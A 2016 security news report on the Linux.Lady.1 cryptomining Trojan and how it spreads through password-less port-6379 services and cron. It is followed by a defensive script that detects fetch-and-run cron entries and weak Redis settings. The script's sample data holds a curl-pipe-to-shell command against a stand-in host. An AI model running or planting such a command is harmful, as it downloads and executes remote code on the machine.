Trojan Goes Cryptocurrency Mining
Thursday, August 11, 2016 @ 03:08 PM gHale
A new Linux Trojan can run a cryptocurrency mining program on an infected computer, researchers said.
Called Linux.Lady.1, the malware uses Google’s Go programming language and libraries available on GitHub, said researchers at antivirus company Dr.Web.
Attackers first used Go to create malware in 2012, but the practice has not gained traction over the years.
Once it infects a system, the Linux malware collects information on the infected machine, including the operating system, CPUs and processes, the researchers said in a post.
The harvested data goes back to a command and control (C&C) server, which provides a configuration file for downloading a cryptocurrency mining application.
The sample analyzed by Dr.Web delivered an application designed for Monero (XMR) mining. Monero is an open source cryptocurrency currently valued at $2 per unit that, unlike Bitcoin, can still be mined using personal computers.
Researchers also said Linux.Lady.1 is capable of spreading to other Linux computers on the infected network. It does this by attempting to connect to remote hosts over port 6379 without a password. Researchers said the attackers are counting on the host being poorly configured.
If the connection is successful, Linux.Lady.1 downloads a script from a specified URL and adds it to the Cron scheduler of the infected device. This script, detected by Dr.Web as Linux.DownLoader.196, is responsible for downloading and installing a copy of the Linux Trojan on the compromised device.
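A defender can check for both halves of the spreading routine described above. The following is an added example, not code from Dr.Web or the article: it assumes the service on port 6379 is Redis (6379 is the Redis default port; the article does not name the service), and the sample crontab and configuration text are constructed.

```python
import re

# Cron entry that fetches a remote script and pipes it straight into a shell.
FETCH_EXEC = re.compile(r"\b(?:curl|wget)\b.*https?://\S+.*\|\s*(?:ba|da|z)?sh\b")

def suspicious_cron_lines(crontab_text):
    """Return (line_no, line) for active cron entries that download and run a script."""
    hits = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if entry and not entry.startswith("#") and FETCH_EXEC.search(entry):
            hits.append((no, entry))
    return hits

def redis_conf_findings(conf_text):
    """List settings that let other hosts connect to Redis without a password."""
    settings = {}
    for line in conf_text.splitlines():
        entry = line.strip()
        if entry and not entry.startswith("#"):
            key, _, value = entry.partition(" ")
            settings[key.lower()] = value.strip()
    findings = []
    if not settings.get("requirepass"):
        findings.append("requirepass not set")
    binds = settings.get("bind", "").split()
    if not binds or any(b not in ("127.0.0.1", "::1", "-::1") for b in binds):
        findings.append("bind not limited to loopback")
    if settings.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode disabled")
    return findings

# Constructed sample inputs (not taken from a real host or from the malware).
SAMPLE_CRON = """# constructed sample crontab
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://example.invalid/x.sh | sh
"""
WEAK_CONF = """# constructed sample redis.conf
bind 0.0.0.0
protected-mode no
port 6379
"""
HARDENED_CONF = """bind 127.0.0.1
requirepass PLACEHOLDER_LONG_RANDOM_SECRET
"""

if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRON))
    print(redis_conf_findings(WEAK_CONF))
    print(redis_conf_findings(HARDENED_CONF))
```

Run the cron check over every user's crontab and the system cron directories, since a script added through an exposed service lands wherever that service's account can write.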